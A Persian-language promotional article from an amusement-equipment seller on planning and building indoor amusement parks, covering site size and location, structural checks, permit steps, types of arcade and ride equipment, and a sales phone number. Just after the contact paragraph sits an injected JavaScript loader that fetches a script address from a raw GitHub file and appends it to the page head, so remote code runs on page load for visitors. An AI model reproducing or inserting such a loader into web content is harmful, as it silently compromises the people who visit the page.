احداث شهربازی سرپوشیده + از طراحی تا تجهیزات

 • همه چیز در مورد احداث شهربازی سرپوشیده + از طراحی تا تجهیزات

  اصول آماده سازی شهربازی سرپوشیده و تجهیزات موردنیاز آن چیست؟ قیمت وسایل شهربازی سرپوشیده چقدر است؟ امروزه، یکی از تفریحات مهیج، نه‌تنها برای کودکان بلکه برای افراد در هر سنی، رفتن به شهربازی است. اما در شرایط بد آب‌ و هوا، این شهربازی‌های سرپوشیده بوده که فضای بازی مناسبی را برای افراد فراهم کرده و راهی عالی برای گذراندن یک روز خاطره‌انگیز هستند.

  در واقع این مکان‌های تفریحی در تمام طول سال در دسترس افراد هستند. به همین دلیل راه‌اندازی شهربازی سرپوشیده، به یک کسب‌ و کار موفق و پرسود تبدیل شده است. در این مقاله از شهربازی سازان طلایی، با مراحل ساخت شهربازی سرپوشیده آشنا می‌شوید. همچنین با ما همراه باشید تا به بررسی تجهیزات موردنیاز آن نیز بپردازیم.

  معرفی شهربازی و انواع آن

  شهربازی (Amusement Park)، محوطه‌ای برای تفریح و سرگرمی است که به‌صورت سرپوشیده یا سرباز وجود دارد. در این مکان‌ها، وسایلی برای تفریح و سرگرمی همه افراد با هر سنی قرار دارد، این تجهیزات سرگرم‌کننده شامل بازی‌های کامپیوتری نیز می‌شود. همچنین برای استفاده از این وسایل بازی، باید هزینه پرداخت کرد که معمولا این هزینه به‌وسیله کارت شارژ‌های شهربازی دریافت می‌شود.

  شهربازی‌ها به دو دسته اصلی روباز و سرپوشیده تقسیم می‌شوند که در ادامه به بررسی آن‌ها می‌پردازیم.

  شهربازی روباز

  شهربازی‌ روباز (outdoor amusement park)، معمولا در محیط‌های بسیار بزرگ احداث می‌شوند. همچنین از تجهیزات و دستگاه‌ های مکانیکی پیچیده‌ تر با ارتفاع بیشتر استفاده می‌کنند؛ بنابراین قوانین و استاندارد‌های ایمنی در آن‌ها متفاوت‌ تر است. این شهربازی‌ ها، در شهر‌ها و کشور‌های مختلف، از نقاط مهم جذب گردشگر محسوب می‌شوند.

  شهربازی سرپوشیده

  شهربازی سرپوشیده (indoor amusement park)، جاذبه‌ای است که در آن وسایل و تجهیزات بازی‌هایی که معمولا در پارک‌های بزرگ‌تر در فضای باز یافت می‌شوند، با ابعاد کوچک‌تر در داخل فضای بسته، قرار می‌گیرند. همچنین به افراد، این امکان را می‌دهد که در تمام فصول سال، بارانی یا آفتابی از شهربازی لذت ببرند. این شهربازی‌ها در مراکز خرید و هتل‌ها برای سرگرمی و جذب مشتری، راه‌اندازی می‌شوند.

  اولین گام آماده سازی شهربازی سرپوشیده چیست؟

  صنعت تفریح و سرگرمی در دو دهه اخیر با گسترش احداث شهربازی‌ های متنوع، به یکی از مهم‌ ترین صنایع پربازده تبدیل شده است. در چند سال گذشته در ایران نیز این صنعت مورد توجه قرار گرفته و در شهر‌های مختلف کشور، شهربازی‌ های سرپوشیده و روباز راه‌اندازی شده است. یک نکته قابل‌تأمل وجود دارد که دراین‌بین، همه شهربازی‌های احداث شده به مرحله سود‌آوری و موفقیت نرسیده‌اند؛ اما چرا؟

  در جواب این سؤال باید گفت که اولین و مهم‌ترین مرحله برای طراحی شهربازی سرپوشیده، مطالعه امکان‌سنجی و مشاوره با متخصصان این صنعت است. پس از آن باید برای ساخت شهربازی سرپوشیده اقدام کرد. در واقع اگر این مرحله با برنامه‌ ریزی دقیق انجام شود، می‌توان انتظار سود دهی و بازده قابل‌ توجهی از پروژه را داشت.

  محل آماده سازی شهربازی سرپوشیده و روباز

  همان‌ طور که پیش‌تر توضیح دادیم؛ پارک بازی سرپوشیده و روباز با هم تفاوت‌های زیادی دارند. این تفاوت‌ها به نوع وسایل و تجهیزات بازی و زمینی که برای احداث شهربازی در نظر گرفته می‌شود، بستگی دارد. به‌طورکلی محل راه‌اندازی شهربازی، از موارد بسیار مهم است که باید با کارشناسی دقیق و تخصصی، این مکان انتخاب شود.

  1- ابعاد زمین در طراحی شهربازی سرپوشیده

  اندازه زمین در طراحی و چیدمان وسایل بازی در یک پارک بازی، اهمیت بسیاری دارد. هر چه ابعاد زمین انتخابی بزرگ‌تر باشد، طراحی شهربازی، هیجان‌ انگیزتر شده و فضای بیشتری برای بازی و رفت‌ و آمد افراد در نظر گرفته می‌شود. طراحی جذاب‌تر، چیدمان منظم تجهیزات تفریحی، تردد راحت‌تر افراد، افزایش وسایل بازی و قرارگیری افراد بیشتر در محوطه، از مزایای انتخاب زمین با ابعاد بزرگ است.

  ابعاد استانداردی برای شهربازی در فضای بسته، وجود ندارد؛ در واقع مساحت زمین، رابطه مستقیمی با میزان سرمایه‌گذاری دارد. این نکته مهم را در نظر بگیرید که باید ارتفاع سالن شهربازی، زیاد باشد. کارشناسان ما با مطالعه و بررسی دقیق، بهترین اندازه و ابعاد را با توجه‌به بودجه شما در نظر می‌گیرند.

  2- موقعیت زمین شهربازی

  بعد از انتخاب ابعاد زمین، باید موقعیت زمین و دسترسی‌ های آن به مراکز مهم و امکانات عمومی را بررسی کنید. برای این منظور بادقت به سؤالات زیر پاسخ دهید.

  • زمین در داخل شهر قرار گرفته یا در خارج از شهر است؟
  • دسترسی آن به وسایل حمل‌ و نقل عمومی مانند اتوبوس و مترو چگونه است؟
  • آیا پارکینگ در اطراف زمین برای وسایل شخصی، به‌اندازه کافی وجود دارد؟
  • دسترسی به امکانات برق، آب و گاز شهری، چگونه است؟
  • زمین با مراکز امدادی، مانند بیمارستان‌ها و آتش‌ نشانی‌ ها چقدر فاصله دارد؟
  • چه میزان فضا برای تردد مردم در محوطه بیرونی می‌توان در نظر گرفت؟

  3 – استحکام زمین شهربازی

  بررسی استحکام زمین شهربازی، برای ایمنی وسایل و تجهیزات تفریحی، ضروری است. برای شهربازی‌ ها یی که در فضای باز یا روی سطح زمین احداث می‌شوند؛ استحکام با نمونه‌ گیری از خاک زمین، بررسی می‌شود. اما از آنجایی‌ که بسیاری از شهربازی‌ سرپوشیده در ساختمان‌های تجاری احداث می‌شوند؛ باید میزان باری که ساختمان در یک مترمربع تحمل می‌کند را بررسی کرد.

  در نظر داشته باشید که میزان رطوبت خاک، تراکم، ارتفاع ساختمان و تحمل حداکثر بار سازه باید توسط متخصصان این حوزه کارشناسی شود. شما می‌توانید برای انجام آزمایش‌ های مکانیک خاک و سازه از مهندسان شرکت فنی و مهندسی شهربازی سازان طلایی ، کمک بگیرید.

  آماده سازی شهربازی

  طرح توجیهی آماده سازی شهربازی سرپوشیده

  داشتن یک طرح توجیهی برای احداث شهربازی سرپوشیده، می‌تواند چراغ راهی برای سرمایه‌گذاری در این صنعت باشد. این طرح شامل کسب مجوز‌های لازم، خرید زمین یا مکان احداث و وسایل بازی می‌شود.

  مراحل کسب مجوز آماده سازی شهربازی

  • ارائه درخواست آماده سازی شهربازی سرپوشیده به اتاق اصناف
  • دریافت استعلام‌ های لازم از اداره استاندارد توسط اتاق اصناف
  • ارسال استعلام اداره استاندارد به شهرداری منطقه، سازمان نظام‌مهندسی و آتش‌نشانی
  • دریافت پاسخ استعلام توسط اداره استاندارد منطقه
  • انجام بازرسی و ارائه تأییدیه ایمنی توسط شرکت بازرسی
  • صدور مجوز توسط اتاق اصناف
  • خرید مکان شهربازی
  • خرید وسایل بازی

  وسایل و تجهیزات موردنیاز برای شهربازی سرپوشیده در طرح توجیهی

  • دستگاه‌ های بازی ویدئویی ، جایزه‌ ای و مکانیکی
  • تجهیزات سالن بیلیارد
  • تجهیزات سالن بولینگ
  • میز فوتبال دستی و دستگاه ایرهاکی
  • تجهیزات راه‌ اندازی سینما چند بعدی
  • راه‌ اندازی و تجهیز رستوران و کافی‌ شاپ

  اصول طراحی شهربازی سرپوشیده و تجهیزات موردنیاز

  تا اینجای متن به بررسی مراحل و شرایط آماده سازی شهربازی سرپوشیده پرداختیم. بهتر است با تجهیزات مورد نیاز نیز آشنا شوید. به‌ طور کلی وسایل شهربازی‌ های فضای بسته در دسته‌بندی‌ های زیر قرار می‌گیرد.

  1- دستگاه‌های مکانیکی شهربازی‌ها

  این دستگاه‌ ها مدل‌ های با ابعاد کوچک‌ تر و سبک، تجهیزات شهربازی‌ روباز هستند. ولی به دلیل ابعاد بزرگ‌تر و وزن بالایی که دارند، باید زیرسازی‌ های مهندسی شده انجام شود، تا تجهیزات به‌صورت ایمن نصب شوند.

  آماده سازی شهربازی

  2- وسایل بازی الکترونیکی

  این دستگاه‌ ها از اصلی‌ ترین وسایل بازی در پارک بازی سرپوشیده هستند. تکان‌دهنده‌ها (کیدی راید‌ها)، بازی‌ های با توپ، اسلحه، آب‌ پاش، چکش و بازی‌های حرکتی مسابقه‌ای در این گروه قرار می‌گیرند.

  3- دستگاه‌های جایزه‌ای

  یکی از وسوسه‌ کننده‌ ترین بازی‌ های این نوع شهربازی‌ ها، دستگاه‌ های جایزه مستقیم هستند. سرعت عمل، دقت و چاشنی شانس، شما را برنده این دستگاه می‌کند. ربات چنگکی (کرین) و ربات انگشتی از این وسایل مهیج هستند.

  4- دستگاه‌های بلیطی (تیکتی)

  این تجهیزات از اصلی‌ترین وسایل بازی پارک بازی هستند. نحوه کار این دستگاه‌ ها به این صورت است که پس از پایان بازی، با توجه‌ به امتیازی که بازیکن دریافت کرده، تیکت می‌گیرد. در نهایت با تحویل این بلیط‌ ها به باجه مربوطه، جایزه دریافت می‌کند.

  5 – میز‌های بازی

  این دستگاه‌ ها در واقع نوعی از وسایل شهربازی هستند که توسط آنها بازیکنان با همدیگر رقابت می‌کنند. روش کار به این صورت است که افراد با قرار گرفتن در دو طرف میز، بازی را انجام می‌دهند. همچنین این وسایل بازی باعث تحرک و انجام حرکات فیزیکی می‌شود. میز ایرهاکی و فوتبال دستی از انواع این بازی‌ها هستند.

  6- دستگاه‌های شبیه‌ ساز و واقعیت مجازی

  این تجهیزات حس هیجان واقعی را به کاربر القا می‌کنند و در مدل‌ های مختلفی وجود دارند. از انواع شبیه‌ ساز می‌توان به دستگاه‌ های شبیه‌ سازی حرکت موتور، ماشین و هواپیما اشاره کرد. تجهیزات واقعیت مجازی نیز با استفاده از عینک مخصوص و سنسور‌های حسی حرکتی، تجربه هیجان را برای کاربر تصویرسازی می‌کنند.

  7 – فضای مخصوص بازی خردسالان

  این وسایل بازی در محیط‌ های مخصوص قرار گرفته و در شرایط ایمن، خردسالان می‌ توانند، بازی کنند. این بخش که به نام خانه بازی نیز شناخته می‌شود از جدیدترین تجهیزات پارک بازی ها است. برای ساخت این قسمت از شهربازی، از محصولات بی‌خطر مانند پلی‌اتیلن، فوم یا چوب استفاده می‌شود.

  نحوی خرید این دستگاه ها

  تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این دستگاه ها به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید